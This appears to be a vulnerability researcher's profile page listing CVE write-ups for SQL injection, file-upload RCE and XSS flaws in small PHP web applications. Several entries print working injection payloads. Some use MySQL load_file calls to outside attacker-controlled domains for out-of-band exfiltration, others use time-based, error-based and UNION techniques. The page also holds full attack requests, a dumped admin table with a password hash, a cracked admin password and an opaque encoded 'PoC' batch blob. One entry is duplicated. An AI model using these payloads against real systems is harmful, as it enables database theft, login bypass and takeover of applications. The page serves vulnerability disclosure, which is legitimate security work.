nu11secur1ty (148)

Last Login: December 09, 2021
Assessments
68
Score
148
8th Place

nu11secur1ty's Latest (20) Contributions

Sort by:
Filter by:
1
Ratings
Technical Analysis

CVE-2021-41646

Vendor

Description:

Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.
The vulnerable directory can be used by the directory traversal method in the browser from the attacker to retrieve sensitive information or destroy the system by using an RCE method for this action!
Status: CRITICAL

Reproduce:

href

Proof and Exploit

href

1
Ratings
Technical Analysis

CVE-2021-42668

Vendor

Description

The id from my_classmates.php in Engineers Online Portal 1.0 parameter appears to be vulnerable to SQL injection and RCE attacks.
The payload ‘+(select load_file(’\\n0o5m5xdxay49mw826umfj1wsnygm9ix90xrkh86.nu11secur1tyPenetrationTestingEngineer.net\sch’))+’ was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can bypass the admin account and he can upload a malicious code by using the avatar vulnerability function with directory traversal method,
then he can execute this malicious code. For this example, the attacker destroys all files in the current directory.
STATUS Hiper Critical and Awful.
CONCLUSION: This pseudo developer must be stopped immediately.

MySQL Request:

GET /nia_munoz_monitoring_system/my_classmates.php?id=189' HTTP/1.1
Host: 192.168.1.2
Cookie: PHPSESSID=k6gnppcljj6b7vs8ua3tdefmkt
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 17:54:59 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5946
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
       <meta name="description" content="Learning Management System">
       <meta name="keywords" conte
...[SNIP]...
<ul     id="da-thumbs" class="da-thumbs">
                                        You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''189'' order by lastname' at line 4

Reproduce:

href

Proof and Exploit:

href

M0r3:

Proof and Explot:

href

1
Ratings
Technical Analysis

CVE-2021-37808

Vendor

Description:

The searchtitle parameter from News Portal Project 3.1 appears to be vulnerable to SQL injection attacks.
The payload ‘+(select load_file(’\\wddcdzjvtmxtfkwxdw5gwdmxpovhj99x00osbiz7.nu11secur1tycollaborator.net\lni’))+’ was submitted in the searchtitle parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can be retrieving sensitive information
for all accounts of this system, and he can manipulate them!
STATUS: Critical and awful.

Reproduce:

href

Proof and Exploit:

href

1
Ratings
Technical Analysis

CVE-2021-41492

Software

Description:

The username parameter from Sourcecodester Simple Cashiering System (POS) 1.0 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can retrieve sensitive information from the database for all users, and also administrator account!

MySQL Request:

POST /cashiering/Actions.php?a=login HTTP/1.1
Host: 192.168.10.63
Origin: http://192.168.10.63
Cookie: PHPSESSID=bgtkft2eqoj6s4ajhp414erka3
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.63/cashiering/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 37

username=tralala'&password=@32e23eq3r

MySQL Response:

HTTP/1.1 200 OK
Date: Wed, 01 Dec 2021 12:06:18 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 521
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: &quot;5a72f9fa6edacd9d71b9e2dc9d1a9ecc&quot; in <b>C:\xampp\htdocs\cashiering\Actions.php</b> on line <b>1
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\cashiering\Actions.php:15
Stack trace:
#0 C:\xampp\htdocs\cashiering\Actions.php(233): Actions-&gt;login()
#1 {main}
thrown in <b>

Reproduce:

href

Proof and explot:

href

BR nu11secur1ty

1
Ratings
Technical Analysis

CTMS

Vendor

Description:

The parameters username and contactno from COVID 19 Testing Management System (CTMS) 1.0 are vulnerable to Remote Code SQL injection attacks.
Test REQUESTS: Payloads 27325265’ or 8079=8079— and 35638130’ or 9157=9162—.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The attacker can execute a Remote Code Injection to override the current password for the admin account directly from the broadcast networks!
Status Critical and awful.
BR nu11secur1ty

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41648

Vendor

Software

Description:

The p parameter of the PuneethReddyHC online-shopping-system-advanced 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file ('\\\\grb7dmacp8fse7awai6uedfhi8o2cz0q2et1jp8.nu11secur1tycollaborator.net\\mpv')) was submitted in the p parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The malicious user can attack the database using four SQL injection methods (UNION query, time-based blind, error-based and boolean-based blind),
then he can dump all information from this database of the app, then he can log in to the admin account, and can do malicious stuff.
Conclusion: Status Critical.

Reproduce:

href

Proof and Exploit:

href

Action:

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41675

Vendor

Author and redevelopment of the PoC

  • nu11secur1ty

First cool ;) Idea:

  • Thank you, dear friend!
  • Janik Wehrli

Description:

A Remote Code Execution (RCE) vulnerability exists in Sourcecodester E-Negosyo System 1.0 in /admin/produts/controller.php via the do Insert function, which validates images with getImageSizei… More about the function: https://www.php.net/manual/en/function.getimagesize.php The attacker can deploy malicious RCE files bypassing this function, and after that, he can use the directory traversal method, to navigate to the /uploaded_photos/ directory which is another and actual problem of this system. After the problem, which is – no sanitizing of the function “(getimagesize())” on this system, the attacker can execute the malicious RCE code, and then he can retrieve all sensitive information about the App on this server, and all architecture of this server. CONCLUSION: There is no proper disinfection of “(getimagesize())” function, and correctly protecting the directory /uploaded_photos/.

Reproduce:

href

Proof and exploit:

href

1
Ratings
Technical Analysis

CVE-2021-42671

Vendor

Description:

An RCE vulnerability exists in Engineers Online Portal 1.0 when the malicious user creates an account with a malicious purpose.
When the user is already with the account he can upload a malicious RCE exploit without any problem – no sanitizing.
After uploading this RCE malicious file, he can navigate by using the directory traversal method, which is another problem of this system, then he can execute the malicious code. Conclusion: Status awful and critical.

Reproduce:

href

Proof and exploit:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-43141

Vendor

Description:

Cross-Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application and users_application.
The attacker can use SQL – Injection bypass Authentication method to log in to the admin account of the system and then he can exploit this account by using XSS-Stored to attack and exploit the account, and then he can use remote requests to hijack PHPSESSID and can exploit this account and users into it by using an XSS-Stored method!
Conclusion: The status of this system is CRITICAL and awful, and this must be stopped immediately for distribution!

Action:

Reproduce:

href

Proof and exploit:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-nu11-20-100121

CVE-2021-41931

Description of vulnerability:

The Company’s Recruitment Management System (by: oretnom23) in id=2 of the parameter from view_vacancy app on-page appears to be vulnerable to SQL Injection – Stealing the Password Hashes attacks.
The payloads 19424269’ or ‘1309’=‘1309 and 39476597’ or ‘2917’=‘2923 were each submitted in the id parameter.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Description of the exploit:

Exploit Title: Recruitment Management System is vulnerable to MyQSL injection - Stealing the Password Hashes attacks.
Date: 2021-10-01
Exploit Author: nu11secur1ty
Vendor Homepage: https://www.sourcecodester.com/user/257130/activity
Software Link: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
Version: (by: oretnom23) dev
  • MySQL Request:
GET /employment_application/?page=view_vacancy&id=219424269'%20or%20'1309'%3d'1309 HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=oku6deve0oo3qbrbbprp5jnb6j
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/employment_application/?page=vacancy
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
  • MySQL Respond
HTTP/1.1 200 OK
Date: Fri, 01 Oct 2021 09:37:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12044

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1
...[SNIP]...
<h5 class="card-title fw-bold wow">Sample Vacancy 101</h5>
...[SNIP]...
<div class="fs-5 ps-4">IT Depatment</div>
...[SNIP]...
<div class="fs-5 ps-4">Jr. Web Developer</div>
...[SNIP]...
<span class="badge bg-success rounded-pill">3</span>
...[SNIP]...
<div class="fs-6 ps-4"><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin pretium vel tortor id semper. Donec ultrices sagittis euismod. Pellentesque ultrices lectus in suscipit ultricies. Morbi eget erat enim. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Mauris nec ex non lectus interdum interdum sit amet in lacus. Maecenas eu nulla nec nisi bibendum euismod in a nibh. Nullam quis gravida turpis. Donec hendrerit sagittis arcu quis mollis. Quisque pretium est in turpis pulvinar, nec pellentesque sem sagittis. Quisque ultrices molestie risus id varius. Vivamus sed efficitur erat, quis cursus massa. In in varius purus. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Quisque eget cursus nunc. Aenean semper neque velit, quis ullamcorper justo efficitur id.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;"><b>Qualification:</b></p><ul><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 1</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 2</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 3<br></li></ul><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">In ut ligula et erat ullamcorper imperdiet. Pellentesque vitae justo facilisis, gravida sapien quis, mollis urna. Proin eu aliquam justo. Cras malesuada, nunc ac varius dapibus, orci ante pretium elit, non porta augue lectus sit amet orci. Ut ac porta mauris. Donec venenatis nisi sit amet massa sollicitudin lobortis. Quisque eros lectus, blandit et dapibus eu, gravida a risus. Vivamus sodales rutrum purus ac dictum. Integer massa velit, facilisis at leo vitae, semper congue mi. Vivamus bibendum sem eget porta tristique. Nunc nisl odio, pellentesque nec pellentesque quis, consequat ut neque. Sed elementum vel augue malesuada ultrices. Nullam dapibus mattis leo vitae laoreet.</p></div>
...[SNIP]...
  • PoC r0n1n.bat
XvL5vVDYAJj4HVMbIvtHb6RMoVRD9iM5nNOr2XqhOpGam2eUj8ytNzzaJyLI+Pv0MtFALO1RllnynHT6Odr38k3iyKIyTN+FszTfPrdRuHJlBKLn79q7ClWCQwWKYtTOXSPGgaKHIyxQz6RR+8JV9FQMmUjHtus7ENGSGsbL8RJIHfCVRqH6xb8tpXPJILc4gIn7mseYxiLp8x7s5Q4QhGXnHvhrsj7lE6jqTQmphumt3gQmBvxlhQILxBKGSG5ZxoVleq4xR/aUiivIiejShajuYChPXHzDF3g/e41aX4BpHa3iQsf390FP+m+FKrpeNPSZUcQAy48EwgEdHNz04yblTBo5sS5ywV5ej+3ZmiwVALH6MSvnLG3mTqglNXSc4+/MkxxmuPrn0Xbe5EZnuGjZTAnWFqfzQJjwy3A8gI2AQWH+RAR2CdWCRzr6hB0rFYJlPrFOKWAgpPB92HfUsQ==

Decrypt of the password

The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123

Reproduce:

href

Proof:

href

  • Music: – UKF

BR @nu11secur1ty

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-nu11-20-100121

CVE-2021-41931

Description of vulnerability:

The Company’s Recruitment Management System (by: oretnom23) in id=2 of the parameter from view_vacancy app on-page appears to be vulnerable to SQL Injection – Stealing the Password Hashes attacks.
The payloads 19424269’ or ‘1309’=‘1309 and 39476597’ or ‘2917’=‘2923 were each submitted in the id parameter.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Description of the exploit:

Exploit Title: Recruitment Management System is vulnerable to MyQSL injection - Stealing the Password Hashes attacks.
Date: 2021-10-01
Exploit Author: nu11secur1ty
Vendor Homepage: https://www.sourcecodester.com/user/257130/activity
Software Link: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
Version: (by: oretnom23) dev
  • MySQL Request:
GET /employment_application/?page=view_vacancy&id=219424269'%20or%20'1309'%3d'1309 HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=oku6deve0oo3qbrbbprp5jnb6j
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/employment_application/?page=vacancy
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
  • MySQL Respond
HTTP/1.1 200 OK
Date: Fri, 01 Oct 2021 09:37:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12044

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1
...[SNIP]...
<h5 class="card-title fw-bold wow">Sample Vacancy 101</h5>
...[SNIP]...
<div class="fs-5 ps-4">IT Depatment</div>
...[SNIP]...
<div class="fs-5 ps-4">Jr. Web Developer</div>
...[SNIP]...
<span class="badge bg-success rounded-pill">3</span>
...[SNIP]...
<div class="fs-6 ps-4"><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin pretium vel tortor id semper. Donec ultrices sagittis euismod. Pellentesque ultrices lectus in suscipit ultricies. Morbi eget erat enim. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Mauris nec ex non lectus interdum interdum sit amet in lacus. Maecenas eu nulla nec nisi bibendum euismod in a nibh. Nullam quis gravida turpis. Donec hendrerit sagittis arcu quis mollis. Quisque pretium est in turpis pulvinar, nec pellentesque sem sagittis. Quisque ultrices molestie risus id varius. Vivamus sed efficitur erat, quis cursus massa. In in varius purus. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Quisque eget cursus nunc. Aenean semper neque velit, quis ullamcorper justo efficitur id.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;"><b>Qualification:</b></p><ul><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 1</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 2</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 3<br></li></ul><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">In ut ligula et erat ullamcorper imperdiet. Pellentesque vitae justo facilisis, gravida sapien quis, mollis urna. Proin eu aliquam justo. Cras malesuada, nunc ac varius dapibus, orci ante pretium elit, non porta augue lectus sit amet orci. Ut ac porta mauris. Donec venenatis nisi sit amet massa sollicitudin lobortis. Quisque eros lectus, blandit et dapibus eu, gravida a risus. Vivamus sodales rutrum purus ac dictum. Integer massa velit, facilisis at leo vitae, semper congue mi. Vivamus bibendum sem eget porta tristique. Nunc nisl odio, pellentesque nec pellentesque quis, consequat ut neque. Sed elementum vel augue malesuada ultrices. Nullam dapibus mattis leo vitae laoreet.</p></div>
...[SNIP]...
  • PoC r0n1n.bat
XvL5vVDYAJj4HVMbIvtHb6RMoVRD9iM5nNOr2XqhOpGam2eUj8ytNzzaJyLI+Pv0MtFALO1RllnynHT6Odr38k3iyKIyTN+FszTfPrdRuHJlBKLn79q7ClWCQwWKYtTOXSPGgaKHIyxQz6RR+8JV9FQMmUjHtus7ENGSGsbL8RJIHfCVRqH6xb8tpXPJILc4gIn7mseYxiLp8x7s5Q4QhGXnHvhrsj7lE6jqTQmphumt3gQmBvxlhQILxBKGSG5ZxoVleq4xR/aUiivIiejShajuYChPXHzDF3g/e41aX4BpHa3iQsf390FP+m+FKrpeNPSZUcQAy48EwgEdHNz04yblTBo5sS5ywV5ej+3ZmiwVALH6MSvnLG3mTqglNXSc4+/MkxxmuPrn0Xbe5EZnuGjZTAnWFqfzQJjwy3A8gI2AQWH+RAR2CdWCRzr6hB0rFYJlPrFOKWAgpPB92HfUsQ==

Decrypt of the password

The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123

Reproduce:

href

Proof:

href

  • Music: – UKF

BR @nu11secur1ty

1
Ratings
Technical Analysis

CVE-2021-42665

Vendor

Description:

An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form inside of index.php, which can allow an attacker to bypass authentication.
And five more SQL – Injections, the attacker can bypass all accounts of this system and he can manipulate those accounts with
malicious purposes and destroy the owners of these accounts. This system also has six more XSS: 4 reflected and 2 (CSRF) vulnerabilities!
Status: Critical and extremely awful!
Conclusion: This system must be stopped from distribution immediately! BR nu11secur1ty

Types of SQL Injections:

---
Parameter: firstname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: firstname=tbcRxVrk' OR NOT 6030=6030#&lastname=tbcRxVrk&department_id='&username=tbcRxVrk&password=x6P!w4r!A0&cpassword=x6P!w4r!A0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: firstname=tbcRxVrk' AND (SELECT 4603 FROM(SELECT COUNT(*),CONCAT(0x716b717671,(SELECT (ELT(4603=4603,1))),0x717a627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- upfj&lastname=tbcRxVrk&department_id='&username=tbcRxVrk&password=x6P!w4r!A0&cpassword=x6P!w4r!A0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: firstname=tbcRxVrk' AND (SELECT 2357 FROM (SELECT(SLEEP(5)))mNaQ)-- xKTb&lastname=tbcRxVrk&department_id='&username=tbcRxVrk&password=x6P!w4r!A0&cpassword=x6P!w4r!A0
---

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-42667

Vendor

Payloads:

Description:

The ID parameter from Online Event Booking and Reservation System 2.3.0 appears to be vulnerable to SQL injection attacks. SQL injection is 4 types.
The malicious user can bypass the database and he can dump all database information then he can access all accounts which this system has! The attacker can take sensitive information and can exploit the users of this system. Conclusion: awful status…
BR nu11secur1ty

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-42580

Vendor

Description:

Sourcecodester Online Learning System 2.0 is vulnerable to SQL injection authentication bypass in the admin login file (/admin/login.php).
After exploiting the admin account by using SQL-malicious payload the attacker can take a PHPSESSID by using XSS-Stored attack and can take control again and again and again. So awful…

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-43130

Vendor

Description:

An SQL Injection vulnerability exists in Sourcecodester Customer Relationship Management System (CRM) 1.0 via the username parameter in customer/login.php.
The parameter username is not sanitizing for malicious POST Requests, the malicious user can use a malicious payload to bypass admin login.

Reproduce:

href

Proof:

href

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-43140

Vendor

Description:

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application’s handling of other input, to confirm whether a vulnerability is present.

MySQL Request:

GET /plan_application/?page=apply&id=4' HTTP/1.1
Host: 192.168.1.2
Cookie: PHPSESSID=jtble9h28f0v3kh3op1ivmm9k4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/plan_application/?page=view_plan&id=4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2021 15:03:36 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 3991
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1
...[SNIP]...
</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\plan_application\apply.php:4
Stack trace:
#0 C:\xampp\htdocs\plan_application\index.php(98): include()
#1 {main}
thrown in <b>
...[SNIP]...

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-26822

Vendor Software

Description

The searchteacher parameter appears to be vulnerable to SQL injection attacks.
The payload ‘+(select load_file(’\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\bqd’))+’ was submitted in the searchteacher parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.

Paylod

---
Parameter: searchteacher (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' AND (SELECT 5113 FROM (SELECT(SLEEP(5)))KIjD) AND 'VevZ'='VevZ&search=%C2%9E%C3%A9e

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707171,0x464270665473516670554b446c745478524849484b654b554b52594859554643445044594f587455,0x7170626b71),NULL,NULL,NULL-- -&search=%C2%9E%C3%A9e
---

After the exploit

Database: trms
Table: tbladmin
[1 entry]
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| ID | Email               | Password                         | UserName | AdminName | AdminRegdate        | MobileNumber |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| 1  | adminuser@gmail.com | f925916e2754e5e03f75dd58a5733251 | admin    | Admin     | 2019-10-04 09:10:04 | 8979555556   |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+

Reproduce:

href

Proof

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-37806

Vendor

Software

On working

Description:

The catename parameter from Vehicle Parking Management System affected version 1.0 app appears to be vulnerable to SQL injection attacks – type time-based blind.
The payload ‘+(select load_file(’\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\hgt’))+’ was submitted in the catename parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.

MySQL Request

POST /Vehicle%20parking%20management%20System%20project/vpms/add-category.php HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=1earei5r7uisqidmakmk0es5ju
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/Vehicle%20parking%20management%20System%20project/vpms/add-category.php
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH7En2PBJTRM5v1Yq
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 241

------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="catename"

277509'+(select load_file('\\\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\\hgt'))+'
------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="submit"

..e
------WebKitFormBoundaryH7En2PBJTRM5v1Yq--

MySQL Response

HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 20:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9928

<!doctype html>
<html class="no-js" lang="">
<head>

<title>VPMS - Add Category</title>


<link rel="apple-touch-icon" href="https://i.imgur.com/QRAUqs9.png">
<link rel="sho
...[SNIP]...

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-38840

Vendor

Software

Description:

The Water Refilling System – PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID

  • m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
    The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
    When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account.
